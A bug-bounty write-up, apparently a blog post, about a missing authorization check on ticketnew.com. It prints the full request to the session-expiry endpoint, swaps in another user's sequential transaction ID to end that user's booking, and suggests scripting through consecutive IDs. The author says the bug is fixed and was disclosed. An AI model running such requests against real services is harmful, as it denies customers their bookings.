How I would have stopped you from booking tickets on ticketnew.com!
TicketNew is an online portal to book movie tickets in all the major cities in India. The company was acquired by PayTM and is backed by Alibaba-Pictures because of its growing customer base and smooth UX.
Recently I found a bug that would have stopped you from booking tickets from the website.
While I was having a look at GET, POST requests by intercepting requests using Burp Suite throughout the application I noticed a POST request that was used to expire my current user session. This request got my attention as it had the transaction id as a parameter.
REQUEST:
POST /calls/ExpiresOngoingTrans HTTP/1.1
Host: www.ticketnew.com
Connection: close
Content-Length: 20
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://www.ticketnew.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36
Content-Type: application/json; charset=UTF-8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: https://www.ticketnew.com/onlinetheatre/Theatre/SelectSeats.aspx?ReqDate=MjAyMC0wMi0wNw==-PwCFBtJZUGI=&VenueID=MTI1NTU=-T/n6zIyzhxc=&EventID=NDQ0NTExMQ==-sT6KuIpYoKI=&LevelID=MA==-110A7HeCwRM=&ReqSeats=MTA=-zISu+SIzx8g=&SiteInfo=MA%3d%3d-110A7HeCwRM%3d&MovieURL=aHR0cHM6Ly93d3cudGlja2V0bmV3LmNvbS8xOTE3LU1vdmllLVRpY2tldHMtT25saW5lLVNob3ctVGltaW5ncy9PbmxpbmUtQWR2YW5jZS1Cb29raW5nLzIxNzI1L0MvTXVtYmFp-v0fP02S1Ens=
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: ASP.NET_SessionId=lhmdgjpzu0cxqijhm1aecetk; __cfduid=db9a19cbf8ceb72f349dca687188f9d461581018226; TN=Mumbai; tkttransid=60500800{‘TransID’:60500852}
My first thought was I should try to expire other user sessions by changing the id. I sent the request to Burp Repeater and replaced the ‘TransID’ with another user session which I had initiated in an incognito mode in a different browser. And Boom, the session got expired even before the allocated time given by the ticketnew.
Response :
HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: application/json; charset=utf-8
Date: Thu, 06 Feb 2020 21:04:17 GMT
Server: Microsoft-IIS/8.5
Set-Cookie: tkttransid=60500800; expires=Sat, 06-Feb-2010 21:04:17 GMT; path=/
Vary: Accept-Encoding
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 9
Connection: Close{“d”:”1"}
There was no check on where the request was coming from and was it authorized.
An interesting thing I noticed was the transaction ID assigned to sessions were in a sequence. So it was easy for me to predict next session IDs and send the POST request. Or writing a script with continuous IDs to send a POST request to them wouldn’t be hard for anyone. Using this bug anyone could prohibit a user from booking tickets until they get frustrated and leave the site causing potential revenue harm to the company.
TicketNew is a fairly big company and PayTM being the parent company their response was not professional. However, since the bug is resolved I have written this article following proper disclosure policy.
